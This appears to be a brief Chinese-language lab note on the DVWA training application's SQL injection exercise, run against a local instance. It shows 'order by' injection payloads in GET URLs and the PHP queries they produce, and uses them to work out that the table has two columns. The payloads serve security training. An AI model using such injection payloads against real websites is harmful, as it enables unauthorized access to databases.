DVWA源码
由源码可知是字符型注入
此题使用GET方法传参,可直接在url编辑参数
127.0.0.1:82/vulnerabilities/sqli/?id=1' order by 1#&Submit=Submit#
php执行
$query = "SELECT first_name, last_name FROM users WHERE user_id = '1' order by 1#;";
后端数据库执行
127.0.0.1:82/vulnerabilities/sqli/?id=1' order by 2#&Submit=Submit#
php执行
$query = "SELECT first_name, last_name FROM users WHERE user_id = '1' order by 2#;";
后端数据库执行
127.0.0.1:82/vulnerabilities/sqli/?id=1' order by 3#&Submit=Submit#
php执行
$query = "SELECT first_name, last_name FROM users WHERE user_id = '1' order by 3#;";
后端数据库执行
由以上猜解知,数据表只有2列。